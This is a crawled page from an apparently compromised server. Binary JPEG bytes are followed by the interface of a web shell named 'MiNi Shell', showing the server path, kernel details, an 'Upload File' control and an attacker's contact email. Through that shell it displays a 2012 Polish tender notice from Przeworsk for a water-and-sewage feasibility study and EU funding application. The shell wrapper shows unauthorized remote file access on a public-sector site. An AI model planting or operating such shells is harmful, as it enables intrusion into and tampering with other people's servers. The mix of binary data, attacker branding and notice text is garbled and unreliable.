JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120522/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120522/165700-N-2012.html

<p class="kh_header"><b>Przeworsk: Przygotowanie studium wykonalności  składanych do Wojewódzkiego Funduszu Ochrony Środowiska w Rzeszowie w Ramach Programu Operacyjnego Infrastruktura i Środowisko Priorytet I Gospodarka wodno - ściekowa , Działanie 1.1 Gospodarka wodno - ściekowa w aglomeracjach powyżej 15 tys. RLM</b><br>
<b>Numer ogłoszenia: 165700 - 2012; data zamieszczenia: 22.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Miasta  Przeworska , ul. Jagiellońska 10, 37-200 Przeworsk, woj. podkarpackie, tel. 016 6487600, faks 016 6487600.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.przeworsk.um.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przygotowanie studium wykonalności  składanych do Wojewódzkiego Funduszu Ochrony Środowiska w Rzeszowie w Ramach Programu Operacyjnego Infrastruktura i Środowisko Priorytet I Gospodarka wodno - ściekowa , Działanie 1.1 Gospodarka wodno - ściekowa w aglomeracjach powyżej 15 tys. RLM.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W zakresie zadania będzie również przygotowanie kompletnego wniosku aplikacyjnego łącznie z załącznikami: 
 	 Wykonanie przedmiotu zamówienia będzie przyjęte przez Zamawiającego jeśli wniosek aplikacyjny i 	dokumenty towarzyszące oraz studium wykonalności przejdą pozytywnie ocenę formalną i merytoryczną w 	procesie oceny wniosków.
	Wniosek aplikacyjny ma być przygotowany w wersji elektronicznej w generatorze wniosków oraz w wersji 	papierowej.
	Studium wykonalności ma się składać z :
1. Podsumowanie danych na temat przedsięwzięcia
1.1. Wnioskodawca przedsięwzięcia
1.2. Podmiot odpowiedzialny za wdrożenie przedsięwzięcia (Beneficjent)
1.3. Dane dotyczące przedsięwzięcia
1.3.1. Tytuł przedsięwzięcia
1.3.2. Podstawowe niedobory systemu wodno-ściekowego
1.3.3. Cele przedsięwzięcia
1.3.4. Opis przedsięwzięcia, w tym zakres rzeczowy
1.3.5. Wyniki analizy opcji
1.3.6. Zgodność przedsięwzięcia z Programem Operacyjnym oraz polityką Polski i UE
w zakresie ochrony środowiska
1.4. Analiza wpływu na środowisko
1.5. Plan wdrożenia przedsięwzięcia
1.5.1. Struktura wdrażania przedsięwzięcia
1.5.2. Niezbędne działania instytucjonalne i administracyjne
1.5.3. Harmonogram realizacji przedsięwzięcia
1.6. Wyniki analizy finansowej
1.7. Wyniki analizy społeczno-ekonomicznej
1.8. Wyniki analizy ryzyka i wrażliwości
1.9. Plan finansowania przedsięwzięcia
1.9.1. Struktura kosztów przedsięwzięcia
1.9.2. Struktura finansowania przedsięwzięcia
2. Opis istniejącego systemu wodno - ściekowego
2.1. Struktura organizacyjna działania systemu wodno-ściekowego
2.1.1. Struktura organizacyjna z uwzględnieniem podziału kompetencji,
współzależności i struktury własności
2.1.2. Informacje na temat funkcjonujących przedsiębiorstw
2.1.2.1.Krótka historia, forma prawna i struktura własności
2.1.2.2.Istniejąca lub potencjalna konkurencja na rynku oferowanych usług,
porównanie cen w przekroju regionalnym i krajowym, obecny udział
przedsiębiorstwa w rynku usług wodno-ściekowych
2.1.2.3.Sytuacja finansowa (obejmująca 3 lata wstecz)
2.2. Parametry ilościowe i jakościowe wody, ścieków oraz osadów ściekowych w
istniejącym systemie
2.2.1. Jakość wody surowej i dostarczanej do odbiorców oraz charakterystyka ścieków
bytowo-gospodarczych, przemysłowych, komunalnych
2.2.2. Bilans wody i ścieków
2.2.3. Charakterystyka powstających osadów ściekowych
2.3. Charakterystyka techniczna istniejącego systemu wodno-ściekowego
2.4. Zgodność działania systemu z wymaganiami polskimi i UE
2.5. Opis niedoborów jakościowych i ilościowych w stosunku do stanu pożądanego
2.6. Zakres inwestycji niezbędnych do zniwelowania niedoborów jakościowych
i ilościowych systemu, w tym inwestycji odtworzeniowych
3. Analiza i prognoza popytu
3.1. Uwarunkowania społeczno-gospodarcze realizacji przedsięwzięcia
3.1.1. Struktura i skala działalności gospodarczej w regionie
3.1.2. Prognozy i strategie rozwojowe dla regionu
3.1.3. Plan inwestycji gminnych
3.2. Bieżący i przyszły popyt zgłaszany przez gospodarstwa domowe
3.2.1. Bieżący popyt oraz identyfikacja aktualnej liczby odbiorców indywidualnych
3.2.2. Prognozy jakościowe i ilościowe zapotrzebowania na usługi
3.2.2.1.Prognozy demograficzne z uwzględnieniem ruchów migracyjnych
3.2.2.2.Analiza zdolności mieszkańców do ponoszenia opłat
3.2.2.3.Przyszły popyt zgłaszany przez odbiorców indywidualnych z uwzględnieniem
cenowej i dochodowej elastyczności popytu
3.3. Bieżący i przyszły popyt zgłaszany przez przemysł
3.3.1. Bieżący popyt
3.3.2. Przyszły popyt
3.4. Bieżący i przyszły popyt zgłaszany przez podmioty uSyteczności publicznej i sektor
usługowy
3.4.1. Bieżący popyt
3.4.2. Przyszły popyt
3.5. Bieżący i przyszły popyt łącznie
3.6. Przyszły bilans wody i ścieków
4. Analiza opcji
4.1. Zakres i metodyka analizy
4.2. Charakterystyka rozważanych rozwiązań lokalizacyjnych i technologicznych
4.2.1. Identyfikacja analizowanych rozwiązań
4.2.2. Szacunki kosztów dla rozważanych opcji
4.2.3. Finansowe i ekonomiczne porównanie rozważanych opcji
4.3. Wskazanie najlepszych rozwiązań spośród rozważanych opcji
5. Analiza instytucjonalna przedsięwzięcia
5.1. Charakterystyka rozważanych opcji w zakresie realizacji inwestycji i eksploatacji
majątku
5.2. Analiza SWOT możliwych rozwiązań instytucjonalnych
5.3. Wskazanie najlepszych rozwiązań spośród analizowanych opcji instytucjonalnych
6. Opis projektu
6.1. Zakres rzeczowy projektu
6.2. Opis i charakterystyka wybranej technologii
6.2.1. Podstawowe parametry technologiczne
6.2.2. Opis podstawowych obiektów i urządzeń
6.3. Lokalizacja przedsięwzięcia
6.3.1. Opis lokalizacji przedsięwzięcia, w tym odbiornika ścieków, warunków wodnogruntowych
6.3.2. Dostępność terenów pod inwestycje, koszty zakupu oraz rekompensat
6.3.3. Zgodność przedsięwzięcia z miejscowymi planami zagospodarowania
przestrzennego
6.4. Kwalifikowane i niekwalifikowane koszty inwestycyjne projektu ze wskazaniem
przyjętej metodyki ich szacowania
6.4.1. Koszty przygotowawcze
6.4.2. Koszty prac budowlano - montażowych; wielkość nakładów na majątek trwały
6.5. Zbiorcze zestawienie zadań budowlanych
6.6. Rozwiązania konstrukcyjne i warunki prowadzenia budowy
6.7. Sposób zagospodarowania produktów ubocznych
7. Analiza oddziaływania na środowisko
7.1. Sposób wdrożenia przez projekt polityk UE
7.1.1. Sposób wdrożenia przez projekt polityki UE w zakresie zrównoważonego
rozwoju tj. trwałości środowiska (europejska polityka w dziedzinie zmian
klimatycznych, zatrzymania utraty bioróżnorodności itd.),
7.1.2. Przyczynienie się wdrożenia projektu do przestrzegania zasady działań
prewencyjnych
7.1.3. Sposób wdrożenia przez projekt zasady zapobiegania zanieczyszczeniom źródła
i zasady zanieczyszczający płaci
7.2. Ocena oddziaływania przedsięwzięcia na środowisko (OOŚ)
7.2.1. Klasyfikacja przedsięwzięcia pod katem wymogu przeprowadzenia oceny
oddziaływania na środowisko w świetle przepisów prawa polskiego i UE.
7.2.2. Stan zaawansowania wymaganych postępowań ws. OOŚ, ocena poprawności
przeprowadzonych procedur pod kątem zgodności z wymogami Dyrektywy
97/11/EC.
7.2.3. Ocena wpływu przedsięwzięcia na obszary Natura 2000 wraz z prezentacją
przeprowadzonych postępowań administracyjnych.
7.2.4. Dodatkowe działania w zakresie ochrony środowiska (np. audyt środowiskowy,
zarządzanie środowiskiem, specjalny monitoring środowiska).
7.2.5. Działania naprawcze związane z negatywnym wpływem przedsięwzięcia na
środowisko.
7.2.6. Harmonogram przeprowadzenia niezakończonych postępowań ws. OOŚ
7.3. Spójność przedsięwzięcia z sektorowymi planami i programami związanymi z
wdrożeniem polityki wspólnotowej lub przepisów dotyczących gospodarki wodnościekowej.
7.4. Strategiczne oceny oddziaływania na środowisko.
7.4.1. Plany i programy podlegające ocenom oddziaływania na środowisko (zgodnie
z Dyrektywą 2001/42/WE), z których wynika realizacja przedsięwzięcia.
7.4.2. Uwzględnienie skutków realizacji przedsięwzięcia w sporządzonych prognozach
oddziaływania planów i programów na środowisko.
8. Plan wdrożenia i funkcjonowania projektu
8.1. Struktura wdrażania przedsięwzięcia, zestawienie i harmonogram niezbędnych działań,
w tym instytucjonalnych i administracyjnych w celu wdrożenia przedsięwzięcia
8.2. Struktura organizacyjna JRP
8.3. Koszty wdrażania przedsięwzięcia
8.4. Proponowany zakres kontraktów, procedury kontraktowe, harmonogram ogłaszania
przetargów i podpisywania kontraktów
8.5. Harmonogram realizacji przedsięwzięcia oraz plan płatności
8.6. Opis struktury organizacyjnej i własnościowej po zakończeniu realizacji przedsięwzięcia
9. Plan finansowania przedsięwzięcia
9.1. Struktura i źródła finansowania kosztów kwalifikowanych i niekwalifikowanych
przedsięwzięcia z podziałem na lata realizacji inwestycji
9.2. Przewidywane sposoby i ocena realności pozyskania zabezpieczeń dla zwrotnych źródeł
finansowania inwestycji
10. Analiza finansowa
10.1. Przyjęte założenia makroekonomiczne, metodyka analizy
10.2. Prognoza przychodów i kosztów w analizowanym okresie dla wariantu
inwestycyjnego i bezinwestycyjnego, projekcja sprawozdań finansowych
10.2.1. Projekcja kosztów rodzajowych oraz pozostałych przychodów i kosztów
operacyjnych
10.2.2. Prognoza przychodów, w tym strategia cenowa
10.2.3. Zapotrzebowanie na kapitał obrotowy
10.2.4. Prognoza sprawozdań finansowych
10.3. Założenia do analizy luki finansowej i analizy efektywności
10.4. Obliczenie poziomu wsparcia środkami pomocowymi
10.5. Analiza efektywności przedsięwzięcia, obliczenie NPV i IRR
10.6. Ocena wyników analizy finansowej, sporządzenie analizy wskaźnikowej
11. Analiza społeczno-ekonomiczna
11.1. Metodyka analizy
11.2. Analiza społeczno-ekonomicznych kosztów
11.3. Analiza społeczno-ekonomicznych korzyści
11.4. Ekonomiczna stopa zwrotu (ERR) i zaktualizowana ekonomiczna wartość netto
(ENPV)
11.5. Skutki przedsięwzięcia dla zatrudnienia
11.6. Niemierzalne korzyści i koszty przedsięwzięcia
12. Analiza wrażliwości i ryzyka
12.1. Analiza wrażliwości
12.1.1. Badane zmienne i ich wpływ na odchylenie wskaźników finansowych
i ekonomicznych
12.1.2. Zestawienie zmiennych uznanych za krytyczne
12.1.3. Wartości progowe dla zmiennych krytycznych
12.2. Analiza ryzyka
12.2.1. Analiza ryzyka w odniesieniu do otrzymanych wyników finansowych
i ekonomicznych
12.2.1.1. Rozkład prawdopodobieństwa zmiennych krytycznych i wskaźników
wyników finansowych
12.2.1.2. Analiza otrzymanych wielkości statystycznych
12.2.2. Analiza ryzyk formalno-instytucjonalnych
12.2.3. Analiza ryzyk ekologiczno-technicznych
12.2.4  Propozycje działań w celu zminimalizowania zidentyfikowanych ryzyk
Wartość kosztorysowa inwestycji w stosunku do której Zamawiający zleca wykonanie  wniosku aplikacyjnego wynosi ok 1,4 mln zł. Na inwestycję składa się 3.253 mb kanalizacji sanitarnej i 1.177 mb wodociągu. Zamawiający posiada projekt budowy kanalizacji i wodociągu. Inwestycja jest na etapie wydanego pozwolenia na budowę..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 14.06.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek jeżeli wykaże , że w okresie ostatnich trzech lat a jeżeli okres działalności jest krótszy to w tym okresie wykonał z należytą starannością  : co najmniej dwa zamówienia z zakresu składania wniosków o dofinansowanie w ramach programów dofinansowywanych z Unii Europejskiej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek jeżeli przedłoży listę pracowników posiadających co najmniej 3 letnie doświadczenie w składaniu dokumentów aplikacyjnych do programów dofinansowanych z Unii Europejskiej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni ten warunek jeżeli wykaże że: ma aktualną i opłaconą polisę ubezpieczeniową odpowiedzialności   cywilnej od wszelkich ryzyk w zakresie prowadzonej działalności obejmującą odpowiedzialność deliktową i kontraktową   na sumę ubezpieczeniową nie mniejszą niż 100 tys. zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca zgodnie z art. 26 ust. 2B ustawy Prawo Zamówień Publicznych może zrealizować zamówienie za pomocą innych podmiotów musi jednak w tym celu wykazać pisemne zobowiązanie na podstawie którego to dokumentu będzie można stwierdzić gotowość oddania mu w użytkowanie zasobów lub przekazaniu osób niezbędnych do wykonania zamówienia. Co zostanie wykazane poprzez przedłożenie Zamawiającemu oświadczeń załączników do oferty i do niniejszej specyfikacji.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przeworsk.bip.info.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Przeworska, ul. Jagiellońska 10, 37-200 Przeworsk pok 122.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 30.05.2012 godzina 10:00, miejsce: Urząd Miasta Przeworska, ul. Jagiellońska 10 37-200 Przeworsk pok 124.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> wniosek i dokumenty towarzyszące będą finansowane ze środków własnych jednostki, W stosunku do studium wykonalności planuje się że po przyjęciu wniosku przez instytucję zarządzającą będzie ono finansowane przy współudziale środków z Unii Europejskiej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com